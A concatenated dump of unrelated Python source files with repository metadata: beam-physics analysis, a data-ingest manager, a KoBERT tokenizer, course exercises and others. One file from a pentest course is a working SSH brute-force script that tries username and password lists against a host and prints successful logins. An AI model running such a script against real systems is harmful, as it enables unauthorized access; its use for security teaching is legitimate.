xbins = self.slice_data(self.x)
xpbins = self.slice_data(self.xp)
exbins = self.slice_horizontal_emittance
emitbins = list(zip(xbins, xpbins, exbins))
self.slice['slice_alpha_x'] = np.array([-1*self.covariance(x, xp)/ex if ex > 0 else 0 for x, xp, ex in emitbins])
return self.slice['slice_alpha_x']
@property
def slice_gamma_x(self):
self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
return self.twiss['gamma_x']
@property
def slice_beta_y(self):
ybins = self.slice_data(self.beam['y'])
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, eybins))
self.slice['slice_beta_y'] = np.array([self.covariance(y, y)/ey if ey > 0 else 0 for y, ey in emitbins])
return self.slice['slice_beta_y']
@property
def slice_alpha_y(self):
ybins = self.slice_data(self.y)
ypbins = self.slice_data(self.yp)
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, ypbins, eybins))
self.slice['slice_alpha_y'] = np.array([-1*self.covariance(y,yp)/ey if ey > 0 else 0 for y, yp, ey in emitbins])
return self.twiss['slice_alpha_y']
@property
def slice_gamma_y(self):
self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
return self.twiss['gamma_y']
def sliceAnalysis(self, density=False):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
slice_density = self.slice_density[peakIPosition] if density else 0
return self.slice_peak_current[peakIPosition], \
np.std(self.slice_peak_current), \
self.slice_relative_momentum_spread[peakIPosition], \
self.slice_normalized_horizontal_emittance[peakIPosition], \
self.slice_normalized_vertical_emittance[peakIPosition], \
self.slice_momentum[peakIPosition], \
self.slice_density[peakIPosition],
def mvesliceAnalysis(self):
self.slice = {}
self.bin_time()
peakIPosition = self.slice_max_peak_current_slice
return self.slice_peak_current[peakIPosition], \
np.std(self.slice_peak_current), \
self.slice_relative_momentum_spread[peakIPosition], \
self.slice_normalized_mve_horizontal_emittance[peakIPosition], \
self.slice_normalized_mve_vertical_emittance[peakIPosition], \
self.slice_momentum[peakIPosition], \
self.slice_density[peakIPosition],
@property
def chirp(self):
self.bin_time()
slice_current_centroid_indices = []
slice_momentum_centroid = []
peakIPosition = self.slice_max_peak_current_slice
peakI = self.slice_peak_current[peakIPosition]
slicemomentum = self.slice_momentum
for index, slice_current in enumerate(self.slice_peak_current):
if abs(peakI - slice_current) < (peakI * 0.75):
slice_current_centroid_indices.append(index)
for index in slice_current_centroid_indices:
slice_momentum_centroid.append(slicemomentum[index])
chirp = (1e-18 * (slice_momentum_centroid[-1] - slice_momentum_centroid[0]) / (len(slice_momentum_centroid) * self.slice_length))
return chirp
@property
def x(self):
return self.beam['x']
@property
def y(self):
return self.beam['y']
@property
def z(self):
return self.beam['z']
@property
def zn(self):
return self.beam['z']-np.mean(self.beam['z'])
@property
def px(self):
return self.beam['px']
@property
def py(self):
return self.beam['py']
@property
def pz(self):
return self.beam['pz']
@property
def cpx(self):
return self.beam['px'] / self.q_over_c
@property
def cpy(self):
return self.beam['py'] / self.q_over_c
@property
def cpz(self):
return self.beam['pz'] / self.q_over_c
@property
def xp(self):
return np.arctan(self.px/self.pz)
@property
def yp(self):
return np.arctan(self.py/self.pz)
@property
def t(self):
return self.beam['t']
@property
def p(self):
return self.cp * self.q_over_c
@property
def cp(self):
return np.sqrt(self.cpx**2 + self.cpy**2 + self.cpz**2)
@property
def Brho(self):
return np.mean(self.p) / constants.elementary_charge
@property
def gamma(self):
return np.sqrt(1+(self.cp/self.E0_eV)**2)
@property
def BetaGamma(self):
return self.cp/self.E0_eV
@property
def vx(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.px
@property
def vy(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.py
@property
def vz(self):
velocity_conversion = 1 / (constants.m_e * self.gamma)
return velocity_conversion * self.pz
@property
def Bx(self):
return self.vx / constants.speed_of_light
@property
def By(self):
return self.vy / constants.speed_of_light
@property
def Bz(self):
return self.vz / constants.speed_of_light
@property
def charge(self):
return self.beam['total_charge']
@property
def sigma_z(self):
return self.rms(self.Bz*constants.speed_of_light*(self.beam['t'] - np.mean(self.beam['t'])))
@property
def momentum_spread(self):
return self.cp.std()/np.mean(self.cp)
@property
def linear_chirp_z(self):
return -1*self.rms(self.Bz*constants.speed_of_light*self.t)/self.momentum_spread/100
def computeCorrelations(self, x, y):
xAve = np.mean(x)
yAve = np.mean(y)
C11 = 0
C12 = 0
C22 = 0
for i, ii in enumerate(x):
dx = x[i] - xAve
dy = y[i] - yAve
C11 += dx*dx
C12 += dx*dy
C22 += dy*dy
C11 /= len(x)
C12 /= len(x)
C22 /= len(x)
return C11, C12, C22
@property
def eta_x(self):
return self.calculate_etax()[0]
@property
def eta_xp(self):
return self.calculate_etax()[1]
def calculate_etax(self):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = -pAve * S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = -pAve * S26/S66 if S66 else 0
return eta1, etap1, np.mean(self.t)
def performTransformation(self, x, xp, beta=False, alpha=False, nEmit=False):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(x, xp)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
R22 = beta1/np.sqrt(beta1*beta2)
if nEmit is not False:
factor = np.sqrt(nEmit / (emit*pAve))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlane(self, beta=False, alpha=False, nEmit=False):
x, xp = self.performTransformation(self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlane(self, beta=False, alpha=False, nEmit=False):
y, yp = self.performTransformation(self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def performTransformationPeakISlice(self, xslice, xpslice, x, xp, beta=False, alpha=False, nEmit=False):
p = self.cp
pAve = np.mean(p)
p = [a / pAve - 1 for a in p]
S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
eta1 = S16/S66 if S66 else 0
S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
etap1 = S26/S66 if S66 else 0
for i, ii in enumerate(x):
x[i] -= p[i] * eta1
xp[i] -= p[i] * etap1
S11, S12, S22 = self.computeCorrelations(xslice, xpslice)
emit = np.sqrt(S11*S22 - S12**2)
beta1 = S11/emit
alpha1 = -S12/emit
beta2 = beta if beta is not False else beta1
alpha2 = alpha if alpha is not False else alpha1
R11 = beta2/np.sqrt(beta1*beta2)
R12 = 0
R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
R22 = beta1/np.sqrt(beta1*beta2)
if nEmit is not False:
factor = np.sqrt(nEmit / (emit*pAve))
R11 *= factor
R12 *= factor
R22 *= factor
R21 *= factor
for i, ii in enumerate(x):
x0 = x[i]
xp0 = xp[i]
x[i] = R11 * x0 + R12 * xp0
xp[i] = R21*x0 + R22*xp0
return x, xp
def rematchXPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
xslice = self.slice_data(self.x)[peakIPosition]
xpslice = self.slice_data(self.xp)[peakIPosition]
x, xp = self.performTransformationPeakISlice(xslice, xpslice, self.x, self.xp, beta, alpha, nEmit)
self.beam['x'] = x
self.beam['xp'] = xp
cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.yp * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
def rematchYPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
peakIPosition = self.slice_max_peak_current_slice
yslice = self.slice_data(self.y)[peakIPosition]
ypslice = self.slice_data(self.yp)[peakIPosition]
y, yp = self.performTransformationPeakISlice(yslice, ypslice, self.y, self.yp, beta, alpha, nEmit)
self.beam['y'] = y
self.beam['yp'] = yp
cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
cpx = self.xp * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
@property
def Sx(self):
return np.sqrt(self.covariance(self.x,self.x))
@property
def Sy(self):
return np.sqrt(self.covariance(self.y,self.y))
| [
"[email protected]"
] | |
a0fb061548bfd69cb764cc4823ae29227aa804a6 | 0e8ab63a60fd03b1778aa392c0b11fedd88409e4 | /ingest/ingest/manager.py | 8ed7b3d707ce64b45eb7b82fa5323c3a84a15a39 | [] | no_license | Kyeongrok/dms | babeb19115355c3d930c94c89ca55d3e5de2dc55 | a67c446f0ffd3f9a1812de961ef915c405a4096f | refs/heads/master | 2021-06-23T22:44:18.881538 | 2019-09-26T03:42:13 | 2019-09-26T03:42:13 | 210,993,619 | 0 | 0 | null | 2021-03-25T22:57:32 | 2019-09-26T03:41:24 | Python | UTF-8 | Python | false | false | 2,747 | py | import abc
import logging
import os
from dmsclient.client import DMSClient
from dmsclient.exceptions import DMSClientException
from ingest import util
from ingest.logger import ElasticsearchHandler, JournalFormatter
class AbstractIngestManager(abc.ABC):
def __init__(self, config, mount_path, reader_id, cartridge_id):
self.log = logging.getLogger('ingest.manager')
self.config = config
self.thread_count = config['general']['threads']
self.check_mountpoints = config['general']['check_mountpoints']
self.ignore_directories = config['general']['ignore_directories']
self.log_to_es = config['general']['log_to_es']
self.mount_path = mount_path
self.reader_id = reader_id
self.cartridge_id = cartridge_id
self.client = DMSClient(es_endpoint=config['elasticsearch']['endpoint'],
es_user=config['elasticsearch']['user'],
es_password=config['elasticsearch']['password'],
create_templates=config['elasticsearch']['create_templates'],
verify_templates=config['elasticsearch']['verify_templates'])
if self.log_to_es:
handler = ElasticsearchHandler(self.client)
formatter = JournalFormatter()
handler.setFormatter(formatter)
root_logger = logging.getLogger('ingest')
root_logger.addHandler(handler)
if not self.mount_path.startswith('rsync://'):
try:
self.mount_path = os.path.abspath(self.mount_path)
self.__check_path(self.mount_path, readwrite=False)
except Exception as e:
self.log.error('Error checking the input path. {}'.format(str(e),))
raise e
def update_reader(self, message):
if self.reader_id:
self.client.readers.set_message(self.reader_id, message)
def set_cartridge_workflow_type(self, cartridge_id, workflow_type):
if self.cartridge_id:
self.client.cartridges.set_workflow_type(self.cartridge_id, workflow_type)
@abc.abstractmethod
def run(self):
pass
def __check_path(self, path, readwrite=False):
if path.startswith('rsync://'):
return
if readwrite:
self.log.info("Checking write permissions on path '%s'" % (path,))
if not util.isWritable(path):
raise Exception('Cannot write to directory: %s' % (path,))
else:
self.log.info("Checking read permissions on path '%s'" % (path,))
if not util.isReadable(path):
raise Exception('Cannot read from directory: %s' % (path,))
| [
"[email protected]"
] | |
1d3aa6d35106c3460d100c2156236cc0871312ec | fc5becca3e2e48a444b512e059df1cd21601829b | /Aulas/Aula19A.py | 4d8089077e3bdd14ae5f3b3b6ced29a4100d4556 | [
"MIT"
] | permissive | Felix-xilef/Curso-de-Python | c44bf8c22b393aefaed3a2bb3127ef7999e27fb8 | cdff7c7f3850e6326e274c8c1987b9e1a18ce910 | refs/heads/master | 2021-05-19T11:09:22.644638 | 2020-04-01T22:09:02 | 2020-04-01T22:09:02 | 251,665,966 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 482 | py | # Dicionários {} / dict() - como uma lista, porém o indice pode ser definido (key)
pessoas = {'nome': 'Felix', 'sexo': 'm', 'idade': 18}
print(pessoas)
print(pessoas['nome'])
print(pessoas['idade'])
print(pessoas.values())
print(pessoas.keys())
print(pessoas.items())
for k, v in pessoas.items():
print(k, '=', v)
del pessoas['sexo']
print(pessoas)
pessoas['nome'] = 'Gustavo'
print(pessoas)
pessoas['peso'] = 74
print(pessoas)
input('\n\nPressione <enter> para continuar')
| [
"[email protected]"
] | |
c4b90c1495df475c554108312c8e2a94b88ee10d | ef66e297a49d04098d98a711ca3fda7b8a9a657c | /Python/display.py | 1b280e0ad29c46c1e08530191b08e20ef0df52eb | [] | no_license | breezy1812/MyCodes | 34940357954dad35ddcf39aa6c9bc9e5cd1748eb | 9e3d117d17025b3b587c5a80638cb8b3de754195 | refs/heads/master | 2020-07-19T13:36:05.270908 | 2018-12-15T08:54:30 | 2018-12-15T08:54:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,897 | py | # coding: UTF-8
__metaclass__ = type
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
import random
import socket
i = 0
winId = 0
s = None
poses = []
SIZE = [800, 600]
clear = True
def Draw():
global poses
global clear
glEnable(GL_POINT_SMOOTH)
if clear:
glClear(GL_COLOR_BUFFER_BIT)
clear = False
glPointSize(5)
glBegin(GL_POINTS)
for item in poses:
try:
if item[2] == 1:
glVertex2f(item[0], item[1])
elif item[2] == -1:
clear = True
except:
pass
poses = []
glEnd()
glFlush()
def Update():
global s
global poses
try:
data = s.recv(4096).split('|')
poses = map(lambda x: map(lambda y: int(y), x.split(',')), data)
if not data:
raise Exception
except Exception, e:
print e
s.close()
sys.exit(0)
for item in poses:
item[0] = (item[0]*1.0/SIZE[0]*200-100)/100.0
item[1] = -((item[1]*1.0/SIZE[1]*200-100))/100.0
print poses
glutPostRedisplay()
def keyboardHit(key, mouseX, mouseY):
if key == 'q':
global s
glutDestroyWindow(winId)
s.close()
sys.exit()
def mouseHit(button, state, mouseX, mouseY):
pass
def mouseMotion(mouseX, mouseY):
pass
def main():
global winId
global s
s = socket.socket()
host = socket.gethostname()
s.connect((host, 1234))
glutInit()
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA)
glutInitWindowSize(SIZE[0], SIZE[1])
winId = glutCreateWindow("David")
glutDisplayFunc(Draw)
glutIdleFunc(Update)
glutKeyboardFunc(keyboardHit)
glutMouseFunc(mouseHit)
glutMotionFunc(mouseMotion)
glutMainLoop()
if __name__ == '__main__':
try:
main()
except Exception, e:
print e
| [
"[email protected]"
] | |
e57f6351bc13444d18ec9ae6b667d6e3d4b37ed4 | a7e75fcd05aa8ebf2066c4eb0a05496042dd5ded | /better_work_data/better_work_data/items.py | ab7aeb32e62a563ca44dce609a18c2de91fd0b79 | [
"MIT"
] | permissive | JackDan9/miniProgram | d6fe14fced0f9a154d01a6f950ab26325ed445de | d60a33275334b4caa3c15d5c6196938fb800505b | refs/heads/master | 2023-02-10T13:26:23.453536 | 2023-01-09T03:41:43 | 2023-01-09T03:41:43 | 132,235,452 | 1 | 0 | MIT | 2023-02-08T00:42:41 | 2018-05-05T09:55:32 | JavaScript | UTF-8 | Python | false | false | 515 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class BetterWorkDataItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
order = scrapy.Field()
title = scrapy.Field()
summary = scrapy.Field()
source_type = scrapy.Field()
source_name = scrapy.Field()
publish_on = scrapy.Field()
created_on = scrapy.Field()
updated_on = scrapy.Field()
pass
| [
"[email protected]"
] | |
1dca65b0e31944c67b64eb4542abf988338475ba | 882026439fb24cacbd1b671ae43bd0da2ac734df | /tokenization_kobert.py | 34d3fa079c7717814a8dd0d6598c01ac5a33c59f | [
"Apache-2.0"
] | permissive | fightnyy/Stock_Prediction | 94fa5761a1860429d033ecc735d9fa89d75667b8 | f0dd42bd511e74876ede92c4d10aa6384d542613 | refs/heads/master | 2023-07-11T04:30:48.546817 | 2021-08-19T06:30:01 | 2021-08-19T06:30:01 | 338,271,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,022 | py | # coding=utf-8
# Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team and Jangwon Park
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Tokenization classes for KoBert model."""
import logging
import os
import sentencepiece as spm
import unicodedata
from shutil import copyfile
from transformers import PreTrainedTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "tokenizer_78b3253a26.model",
"vocab_txt": "vocab.txt"}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/tokenizer_78b3253a26.model",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/tokenizer_78b3253a26.model",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/tokenizer_78b3253a26.model"
},
"vocab_txt": {
"monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/vocab.txt",
"monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/vocab.txt",
"monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/vocab.txt"
}
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"monologg/kobert": 512,
"monologg/kobert-lm": 512,
"monologg/distilkobert": 512
}
PRETRAINED_INIT_CONFIGURATION = {
"monologg/kobert": {"do_lower_case": False},
"monologg/kobert-lm": {"do_lower_case": False},
"monologg/distilkobert": {"do_lower_case": False}
}
SPIECE_UNDERLINE = u'▁'
class KoBertTokenizer(PreTrainedTokenizer):
"""
SentencePiece based tokenizer. Peculiarities:
- requires `SentencePiece <https://github.com/google/sentencepiece>`_
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
def __init__(
self,
vocab_file,
vocab_txt,
do_lower_case=False,
remove_space=True,
keep_accents=False,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
**kwargs):
super().__init__(
unk_token=unk_token,
sep_token=sep_token,
pad_token=pad_token,
cls_token=cls_token,
mask_token=mask_token,
**kwargs
)
# Build vocab
self.token2idx = dict()
self.idx2token = []
with open(vocab_txt, 'r', encoding='utf-8') as f:
for idx, token in enumerate(f):
token = token.strip()
self.token2idx[token] = idx
self.idx2token.append(token)
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.do_lower_case = do_lower_case
self.remove_space = remove_space
self.keep_accents = keep_accents
self.vocab_file = vocab_file
self.vocab_txt = vocab_txt
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(vocab_file)
@property
def vocab_size(self):
return len(self.idx2token)
def get_vocab(self):
return dict(self.token2idx, **self.added_tokens_encoder)
def __getstate__(self):
state = self.__dict__.copy()
state["sp_model"] = None
return state
def __setstate__(self, d):
self.__dict__ = d
try:
import sentencepiece as spm
except ImportError:
logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece"
"pip install sentencepiece")
self.sp_model = spm.SentencePieceProcessor()
self.sp_model.Load(self.vocab_file)
def preprocess_text(self, inputs):
if self.remove_space:
outputs = " ".join(inputs.strip().split())
else:
outputs = inputs
outputs = outputs.replace("``", '"').replace("''", '"')
if not self.keep_accents:
outputs = unicodedata.normalize('NFKD', outputs)
outputs = "".join([c for c in outputs if not unicodedata.combining(c)])
if self.do_lower_case:
outputs = outputs.lower()
return outputs
def _tokenize(self, text, return_unicode=True, sample=False):
""" Tokenize a string. """
text = self.preprocess_text(text)
if not sample:
pieces = self.sp_model.EncodeAsPieces(text)
else:
pieces = self.sp_model.SampleEncodeAsPieces(text, 64, 0.1)
new_pieces = []
for piece in pieces:
if len(piece) > 1 and piece[-1] == str(",") and piece[-2].isdigit():
cur_pieces = self.sp_model.EncodeAsPieces(piece[:-1].replace(SPIECE_UNDERLINE, ""))
if piece[0] != SPIECE_UNDERLINE and cur_pieces[0][0] == SPIECE_UNDERLINE:
if len(cur_pieces[0]) == 1:
cur_pieces = cur_pieces[1:]
else:
cur_pieces[0] = cur_pieces[0][1:]
cur_pieces.append(piece[-1])
new_pieces.extend(cur_pieces)
else:
new_pieces.append(piece)
return new_pieces
def _convert_token_to_id(self, token):
""" Converts a token (str/unicode) in an id using the vocab. """
return self.token2idx.get(token, self.token2idx[self.unk_token])
def _convert_id_to_token(self, index, return_unicode=True):
"""Converts an index (integer) in a token (string/unicode) using the vocab."""
return self.idx2token[index]
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (strings for sub-words) in a single string."""
out_string = "".join(tokens).replace(SPIECE_UNDERLINE, " ").strip()
return out_string
def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks
by concatenating and adding special tokens.
A KoBERT sequence has the following format:
single sequence: [CLS] X [SEP]
pair of sequences: [CLS] A [SEP] B [SEP]
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + token_ids_1 + sep
def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
"""
Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods.
Args:
token_ids_0: list of ids (must not contain special tokens)
token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids
for sequence pairs
already_has_special_tokens: (default False) Set to True if the token list is already formated with
special tokens for the model
Returns:
A list of integers in the range [0, 1]: 0 for a special token, 1 for a sequence token.
"""
if already_has_special_tokens:
if token_ids_1 is not None:
raise ValueError(
"You should not supply a second sequence if the provided sequence of "
"ids is already formated with special tokens for the model."
)
return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0))
if token_ids_1 is not None:
return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1]
def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
"""
Creates a mask from the two sequences passed to be used in a sequence-pair classification task.
A KoBERT sequence pair mask has the following format:
0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1
| first sequence | second sequence
if token_ids_1 is None, only returns the first portion of the mask (0's).
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1]
def save_vocabulary(self, save_directory):
""" Save the sentencepiece vocabulary (copy original file) and special tokens file
to a directory.
"""
if not os.path.isdir(save_directory):
logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
return
# 1. Save sentencepiece model
out_vocab_model = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_file"])
if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_model):
copyfile(self.vocab_file, out_vocab_model)
# 2. Save vocab.txt
index = 0
out_vocab_txt = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_txt"])
with open(out_vocab_txt, "w", encoding="utf-8") as writer:
for token, token_index in sorted(self.token2idx.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
"Saving vocabulary to {}: vocabulary indices are not consecutive."
" Please check that the vocabulary is not corrupted!".format(out_vocab_txt)
)
index = token_index
writer.write(token + "\n")
index += 1
return out_vocab_model, out_vocab_txt
| [
"[email protected]"
] | |
dc52624b745e24996b18b3d581240cefcbe6d403 | 04934bc61ceab01ad24ab1672461a1b103884e91 | /ssh/sshconn_002.py | da12bca4af6f78377d324cb95c618bfe4ad0dab7 | [] | no_license | aiedonline/aulapentest | 05f31d0410493f02361fe778ab02d584aa84ef5e | 1dd28feb95941f49205af836c9013283b4cb6b99 | refs/heads/main | 2023-08-18T10:22:19.596876 | 2021-09-26T20:14:50 | 2021-09-26T20:14:50 | 402,219,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | #!/usr/bin/python
import sys;
from netmiko import Netmiko
ip = "11.11.11.171";
print("\033[1;33m[*] - SSH Bruteforce Attack", " \033[0;0m");
print("\033[1;33m[*] - SSH target", ip, " \033[0;0m");
with open("user.txt") as users:
users = users.readlines();
for user in users:
passwords_testados = [];
with open("password.txt") as passwords:
passwords = passwords.readlines();
passwords.insert(0, user); # a senha mais usada e o proprio usuario
for password in passwords:
try:
if password in passwords_testados:
continue;
sshconn = Netmiko(ip, username= user.strip(), password=password.strip(), device_type="linux");
sshconn.disconnect();
print("\033[1;32m[+] SUCES PARA", user.strip(), password.strip(), " \033[0;0m");
except KeyboardInterrupt:
print( 'Usuarqio quer sair.');
sys.exit(0);
except:
print("\033[1;31m[-] FALHA PARA", user.strip(), password.strip(), " \033[0;0m");
finally:
passwords_testados.insert(0, password);
| [
"[email protected]"
] | |
6fdea119f9c9239b63eda3db6b7c2b1d0233e66d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02585/s776126936.py | 78cc9d2cac5fd2a3bfb611ed540139e54d721039 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,175 | py | import sys
sys.setrecursionlimit(10**7)
readline = sys.stdin.buffer.readline
def readstr():return readline().rstrip().decode()
def readstrs():return list(readline().decode().split())
def readint():return int(readline())
def readints():return list(map(int,readline().split()))
def printrows(x):print('\n'.join(map(str,x)))
def printline(x):print(' '.join(map(str,x)))
def check(cir,num):
m = len(cir)
a = sum(cir)
if num == 0:
ss = 0
elif num == 1:
ss = max(cir)
else:
ac = list(accumulate([0]+cir))
l = 0
r = 1
ss = ac[r]-ac[l]
i = 0
while 1:
if r == m:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
ss = max(ss,ac[r]-ac[l])
break
elif i%2==0:
r = ac[r+1:l+num+1].index(max(ac[r+1:l+num+1])) + r+1
else:
l = ac[l+1:r].index(min(ac[l+1:r])) + l+1
i+=1
ss = max(ss,ac[r]-ac[l])
num = m-num
l = 0
r = num
i = 0
ss = max(ss,a-ac[r]+ac[l])
while 1:
if r == m:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
ss = max(ss,a-ac[r]+ac[l])
break
elif i%2==0:
r = ac[r+1:l+m].index(min(ac[r+1:l+m])) + r+1
else:
l = ac[l+1:r-num+1].index(max(ac[l+1:r-num+1])) + l+1
i+=1
ss = max(ss,a-ac[r]+ac[l])
return ss
from itertools import accumulate
n,k = readints()
p = [x-1 for x in readints()]
c = readints()
circles = []
used = [0]*n
for i in range(n):
if not used[i]:
circles.append([c[i]])
used[i] = 1
j = p[i]
while not used[j]:
circles[-1].append(c[j])
used[j] = 1
j = p[j]
score = -10**20
for cir in circles:
m = len(cir)
a = sum(cir)
if k>m:
if a>0:
score = max(score, (k//m)*a + check(cir,k%m), (k//m-1)*a + check(cir,m))
else:
score = max(score,check(cir,m))
else:
score = max(score,check(cir,k))
print(score)
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.